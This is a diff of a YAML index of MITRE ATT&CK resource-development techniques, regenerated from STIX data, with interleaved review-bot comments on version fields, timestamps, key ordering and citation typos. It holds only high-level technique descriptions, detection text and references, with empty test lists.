@@ -60152,7 +60814,7 @@ resource-development:
url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
Certificates. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:47:46.409Z'
name: Install Digital Certificate
description: "Adversaries may install SSL/TLS certificates that can be used
during targeting. SSL/TLS certificates are files that can be installed on
@@ -60186,8 +60848,6 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1584.002:
technique:
@@ -60235,7 +60895,7 @@ resource-development:
Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.
By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.(Citation: FireEye DNS Hijack 2019)(Citation: Crowdstrike DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T21:22:13.578Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: DNS Server
x_mitre_detection: |-
@@ -60251,7 +60911,6 @@ resource-development:
- 'Domain Name: Passive DNS'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585:
technique:
@@ -60310,54 +60969,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
- type: attack-pattern
- created: '2020-10-01T01:56:24.776Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1588
- url: https://attack.mitre.org/techniques/T1588
- - source_name: NationsBuying
- description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
- Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
- url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
- - url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
- description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
- Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
- Human Rights Defender. Retrieved December 12, 2016.'
- source_name: PegasusCitizenLab
- - description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
- Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
- source_name: DiginotarCompromise
- url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
- - source_name: FireEyeSupplyChain
- description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
- SunshopFireEye. Retrieved March 6, 2017.'
- url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
- - source_name: Analyzing CS Dec 2020
- url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
- description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
- Fun and Profit. Retrieved October 12, 2021.
- - source_name: Splunk Kovar Certificates 2017
- url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
- description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
- Certificates. Retrieved October 16, 2020.
- - source_name: Recorded Future Beacon Certificates
- url: https://www.recordedfuture.com/cobalt-strike-servers/
- description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
- Rogue Cobalt Strike Servers. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-16T16:19:41.568Z'
name: Obtain Capabilities
description: |-
Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.
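Review bot: two entries in the removed T1588 reference list had keys in a different order from the rest, PegasusCitizenLab (`url`, `description`, then `source_name`) and DiginotarCompromise (`description`, `source_name`, then `url`), which is why this block shows as deleted and rewritten rather than moved; the replacement in the next hunk emits every entry as `source_name`/`description`/`url`. All eight `source_name`s (mitre-attack, NationsBuying, PegasusCitizenLab, DiginotarCompromise, FireEyeSupplyChain, Analyzing CS Dec 2020, Splunk Kovar Certificates 2017, Recorded Future Beacon Certificates) reappear below, so no citation in the `x_mitre_detection` text is left dangling.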
@@ -60368,22 +60983,66 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Certificate: Certificate Registration'
- 'Malware Repository: Malware Metadata'
- 'Internet Scan: Response Content'
- 'Malware Repository: Malware Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1
+ created: '2020-10-01T01:56:24.776Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1588
+ external_id: T1588
+ - source_name: PegasusCitizenLab
+ description: 'Bill Marczak and John Scott-Railton. (2016, August 24). The
+ Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE
+ Human Rights Defender. Retrieved December 12, 2016.'
+ url: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
+ - source_name: FireEyeSupplyChain
+ description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
+ SunshopFireEye. Retrieved March 6, 2017.'
+ url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
+ - source_name: DiginotarCompromise
+ description: Fisher, D. (2012, October 31). Final Report on DigiNotar Hack
+ Shows Total Compromise of CA Servers. Retrieved March 6, 2017.
+ url: https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/
+ - source_name: Recorded Future Beacon Certificates
+ description: Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying
+ Rogue Cobalt Strike Servers. Retrieved September 16, 2024.
+ url: https://www.recordedfuture.com/research/cobalt-strike-servers
+ - source_name: Splunk Kovar Certificates 2017
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ - source_name: Analyzing CS Dec 2020
+ description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+ Fun and Profit. Retrieved October 12, 2021.
+ url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+ - source_name: NationsBuying
+ description: Nicole Perlroth and David E. Sanger. (2013, July 12). Nations
+ Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.
+ url: https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1650:
technique:
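Review bot: `spec_version: '2.1'` is removed from this T1588 object (and from every other technique object in this diff) with nothing put in its place; only `x_mitre_attack_spec_version` is bumped from 2.1.0 to 3.2.0. `spec_version` is a required property on STIX 2.1 objects, so if anything in the repo or downstream validates these technique blocks as STIX, dropping it will fail validation. Confirm the omission is a deliberate generator change and not a side effect of the bundle-to-YAML conversion; if it is deliberate, say so in the commit message so the next refresh does not reintroduce it.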
@@ -60446,37 +61105,38 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.007:
technique:
- modified: '2022-10-20T21:19:57.555Z'
+ modified: '2024-10-03T14:18:34.045Z'
name: Serverless
description: "Adversaries may compromise serverless cloud infrastructure, such
- as Cloudflare Workers or AWS Lambda functions, that can be used during targeting.
- By utilizing serverless infrastructure, adversaries can make it more difficult
- to attribute infrastructure used during operations back to them. \n\nOnce
- compromised, the serverless runtime environment can be leveraged to either
- respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
+ as Cloudflare Workers, AWS Lambda functions, or Google Apps Scripts, that
+ can be used during targeting. By utilizing serverless infrastructure, adversaries
+ can make it more difficult to attribute infrastructure used during operations
+ back to them. \n\nOnce compromised, the serverless runtime environment can
+ be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090)
traffic to an adversary-owned command and control server.(Citation: BlackWater
- Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated
- by these functions will appear to come from subdomains of common cloud providers,
- it may be difficult to distinguish from ordinary traffic to these providers.(Citation:
+ Malware Cloudflare Workers)(Citation: AWS Lambda Redirector)(Citation: GWS
+ Apps Script Abuse 2021) As traffic generated by these functions will appear
+ to come from subdomains of common cloud providers, it may be difficult to
+ distinguish from ordinary traffic to these providers - making it easier to
+ [Hide Infrastructure](https://attack.mitre.org/techniques/T1665).(Citation:
Detecting Command & Control in the Cloud)(Citation: BlackWater Malware Cloudflare
Workers)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
- x_mitre_detection: ''
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
+ x_mitre_contributors:
+ - Awake Security
x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.0'
- x_mitre_contributors:
- - Awake Security
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Internet Scan: Response Content'
type: attack-pattern
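Review bot: most of this hunk is key reordering with unchanged values (`x_mitre_detection: ''`, `x_mitre_platforms`, `x_mitre_is_subtechnique: true`, `x_mitre_contributors` all move), which buries the real changes: the description now lists Google Apps Scripts with a `(Citation: GWS Apps Script Abuse 2021)`, gains the `[Hide Infrastructure](https://attack.mitre.org/techniques/T1665)` link, and `x_mitre_version` goes from 1.0 to 1.1. If the generator can serialise keys in a stable order, the next refresh will be reviewable at a glance. Minor: the product is "Google Apps Script" (singular), but since the text is copied from the upstream ATT&CK description that should be fixed upstream, not in this index.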
@@ -60500,11 +61160,14 @@ resource-development:
description: Lawrence Abrams. (2020, March 14). BlackWater Malware Abuses
Cloudflare Workers for C2 Communication. Retrieved July 8, 2022.
url: https://www.bleepingcomputer.com/news/security/blackwater-malware-abuses-cloudflare-workers-for-c2-communication/
+ - source_name: GWS Apps Script Abuse 2021
+ description: Sergiu Gatlan. (2021, February 18). Hackers abuse Google Apps
+ Script to steal credit cards, bypass CSP. Retrieved July 1, 2024.
+ url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.004:
technique:
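Review bot: the new `GWS Apps Script Abuse 2021` reference carries a `#google_vignette` fragment on its url (`url: https://www.bleepingcomputer.com/news/security/hackers-abuse-google-apps-script-to-steal-credit-cards-bypass-csp/#google_vignette`). That fragment is the ad-overlay marker the browser appends when the page is loaded through an interstitial, not part of the article locator; strip it so the entry matches the other BleepingComputer reference two lines above, which has no fragment. Because the value comes from the upstream STIX object, the clean fix is upstream, otherwise a local edit is overwritten on the next regeneration.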
@@ -60562,17 +61225,18 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.006:
technique:
- modified: '2023-03-13T20:35:52.302Z'
+ modified: '2024-08-14T15:03:56.383Z'
name: SEO Poisoning
description: |-
Adversaries may poison mechanisms that influence search engine optimization (SEO) to further lure staged capabilities towards potential victims. Search engines typically display results to users based on purchased ads as well as the site’s ranking/score/reputation calculated by their web crawlers and algorithms.(Citation: Atlas SEO)(Citation: MalwareBytes SEO)
To help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries may stage content that explicitly manipulates SEO rankings in order to promote sites hosting their malicious payloads (such as [Drive-by Target](https://attack.mitre.org/techniques/T1608/004)) within search engines. Poisoning SEO rankings may involve various tricks, such as stuffing keywords (including in the form of hidden text) into compromised sites. These keywords could be related to the interests/browsing habits of the intended victim(s) as well as more broad, seasonably popular topics (e.g. elections, trending news).(Citation: ZScaler SEO)(Citation: Atlas SEO)
+ In addition to internet search engines (such as Google), adversaries may also aim to manipulate specific in-site searches for developer platforms (such as GitHub) to deceive users towards [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) lures. In-site searches will rank search results according to their own algorithms and metrics such as popularity(Citation: Chexmarx-seo) which may be targeted and gamed by malicious actors.(Citation: Checkmarx-oss-seo)
+
Adversaries may also purchase or plant incoming links to staged capabilities in order to boost the site’s calculated relevance and reputation.(Citation: MalwareBytes SEO)(Citation: DFIR Report Gootloader)
SEO poisoning may also be combined with evasive redirects and other cloaking mechanisms (such as measuring mouse movements or serving content based on browser user agents, user language/localization settings, or HTTP headers) in order to feed SEO inputs while avoiding scrutiny from defenders.(Citation: ZScaler SEO)(Citation: Sophos Gootloader)
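Review bot: the added paragraph cites `(Citation: Chexmarx-seo)` with a misspelled vendor name and no space before the marker (`popularity(Citation: Chexmarx-seo)`), while the very next sentence uses `(Citation: Checkmarx-oss-seo)`. The `source_name: Chexmarx-seo` added later in this diff is spelled the same way, so the citation resolves today, but if either side is corrected to `Checkmarx-seo` the other must change in the same commit or the reference goes dangling. Both strings come from the upstream ATT&CK object, so the right place for the fix is upstream; a local edit here will be reverted on the next regeneration.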
@@ -60580,7 +61244,7 @@ resource-development:
- kill_chain_name: mitre-attack
phase_name: resource-development
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
- Vijay Lalwani
- Will Thomas, Equinix Threat Analysis Center (ETAC)
- Will Jolliffe
@@ -60594,7 +61258,7 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- PRE
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Internet Scan: Response Content'
type: attack-pattern
@@ -60627,11 +61291,18 @@ resource-development:
description: Wang, J. (2018, October 17). Ubiquitous SEO Poisoning URLs. Retrieved
September 30, 2022.
url: https://www.zscaler.com/blogs/security-research/ubiquitous-seo-poisoning-urls-0
+ - source_name: Chexmarx-seo
+ description: 'Yehuda Gelb. (2023, November 30). The GitHub Black Market: Gaming
+ the Star Ranking Game. Retrieved June 18, 2024.'
+ url: https://zero.checkmarx.com/the-github-black-market-gaming-the-star-ranking-game-fc42f5913fb7
+ - source_name: Checkmarx-oss-seo
+ description: Yehuda Gelb. (2024, April 10). New Technique to Trick Developers
+ Detected in an Open Source Supply Chain Attack. Retrieved June 18, 2024.
+ url: https://checkmarx.com/blog/new-technique-to-trick-developers-detected-in-an-open-source-supply-chain-attack/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.003:
technique:
@@ -60653,7 +61324,7 @@ resource-development:
description: Wikipedia. (2015, November 10). Code Signing. Retrieved March
31, 2016.
source_name: Wikipedia Code Signing
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:19:50.018Z'
name: Code Signing Certificates
description: |-
Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
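Review bot: `modified` for T1588.003 moves backwards, from `2022-04-25T14:00:00.188Z` to `2021-10-17T16:19:50.018Z`. A regenerated index should not make an object older. The same backward jump appears further down for T1588.005, T1596.003, T1597.002 and T1590.005 (all to 2021-04-15 timestamps), and each of those objects also loses its `spec_version` and `x_mitre_attack_spec_version` lines without gaining a 3.2.0 value, whereas T1588, T1587, T1584.001 and T1592 move forward to 2024 dates and receive `x_mitre_attack_spec_version: 3.2.0`. That pattern suggests these five sub-techniques were pulled from a different (older) source bundle than the rest; confirm which ATT&CK release the generator was pointed at before merging.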
@@ -60671,47 +61342,10 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
- type: attack-pattern
- created: '2020-10-01T01:30:00.877Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1587
- url: https://attack.mitre.org/techniques/T1587
- - url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
- description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
- Units. Retrieved July 18, 2016.
- source_name: Mandiant APT1
- - source_name: Kaspersky Sofacy
- description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
- 4). Sofacy APT hits high profile targets with updated toolset. Retrieved
- December 10, 2015.
- url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
- - source_name: Bitdefender StrongPity June 2020
- url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
- description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
- Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
- - source_name: Talos Promethium June 2020
- url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
- description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
- reach with StrongPity3 APT. Retrieved July 20, 2020.
- - source_name: Splunk Kovar Certificates 2017
- url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
- description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
- Certificates. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T16:31:17.270Z'
name: Develop Capabilities
description: |-
Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)
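Review bot: the first two removed lines leave T1588.003 with neither `spec_version` nor `x_mitre_attack_spec_version`, while T1587 in the same hunk gets `x_mitre_attack_spec_version: 3.2.0` in the following hunk. Either every object should carry the 3.2.0 value or the field should go everywhere; a mixed set means any consumer keying on `x_mitre_attack_spec_version` will silently skip these sub-techniques. The remainder of the hunk is the T1587 `external_references` block being deleted here and re-emitted below `created_by_ref` in the next hunk with `Mandiant APT1` now after `Kaspersky Sofacy`; the six entries removed reappear there, so no reference is lost, but the move adds roughly forty lines of churn for a `modified` bump to `2024-10-15T16:31:17.270Z`.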
@@ -60720,21 +61354,57 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.
Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Content'
- 'Malware Repository: Malware Metadata'
- 'Internet Scan: Response Content'
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--edadea33-549c-4ed1-9783-8f5a5853cbdf
+ created: '2020-10-01T01:30:00.877Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1587
+ external_id: T1587
+ - source_name: Kaspersky Sofacy
+ description: Kaspersky Lab's Global Research and Analysis Team. (2015, December
+ 4). Sofacy APT hits high profile targets with updated toolset. Retrieved
+ December 10, 2015.
+ url: https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/
+ - source_name: Splunk Kovar Certificates 2017
+ description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
+ Certificates. Retrieved October 16, 2020.
+ url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
+ - source_name: Mandiant APT1
+ description: Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage
+ Units. Retrieved July 18, 2016.
+ url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf
+ - source_name: Talos Promethium June 2020
+ description: Mercer, W. et al. (2020, June 29). PROMETHIUM extends global
+ reach with StrongPity3 APT. Retrieved July 20, 2020.
+ url: https://blog.talosintelligence.com/2020/06/promethium-extends-with-strongpity3.html
+ - source_name: Bitdefender StrongPity June 2020
+ description: Tudorica, R. et al. (2020, June 30). StrongPity APT - Revealing
+ Trojanized Tools, Working Hours and Infrastructure. Retrieved July 20, 2020.
+ url: https://www.bitdefender.com/files/News/CaseStudies/study/353/Bitdefender-Whitepaper-StrongPity-APT.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1588.005:
technique:
@@ -60774,7 +61444,7 @@ resource-development:
description: Zetter, K. (2019, October 3). Researchers Say They Uncovered
Uzbekistan Hacking Operations Due to Spectacularly Bad OPSEC. Retrieved
October 15, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:14:01.255Z'
name: Exploits
description: |-
Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)
@@ -60793,15 +61463,13 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1584.001:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-24T15:10:40.270Z'
name: Domains
description: |-
- Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)
+ Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account, taking advantage of renewal process gaps, or compromising a cloud service that enables managing domains (e.g., AWS Route53).(Citation: Krebs DNS Hijack 2019)
Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)
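Review bot: the clause added to the T1584.001 description, "or compromising a cloud service that enables managing domains (e.g., AWS Route53)", is inserted in front of the pre-existing `(Citation: Krebs DNS Hijack 2019)`, so the Krebs article now reads as the support for the Route 53 example; if a separate source backs that case it needs its own citation, and the service's product name is "Amazon Route 53" with a space. Also, the two lines removed at the top of the hunk strip `spec_version` and `x_mitre_attack_spec_version` from T1588.005 with no replacement, the same inconsistency as T1588.003 earlier in this diff.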
@@ -60809,19 +61477,19 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_contributors:
+ - Jeremy Galloway
+ x_mitre_deprecated: false
x_mitre_detection: |-
Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: true
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
- x_mitre_version: '1.3'
- x_mitre_contributors:
- - Jeremy Galloway
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Domain Name: Passive DNS'
- 'Domain Name: Domain Registration'
@@ -60855,55 +61523,64 @@ resource-development:
url: https://docs.microsoft.com/en-us/azure/security/fundamentals/subdomain-takeover
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
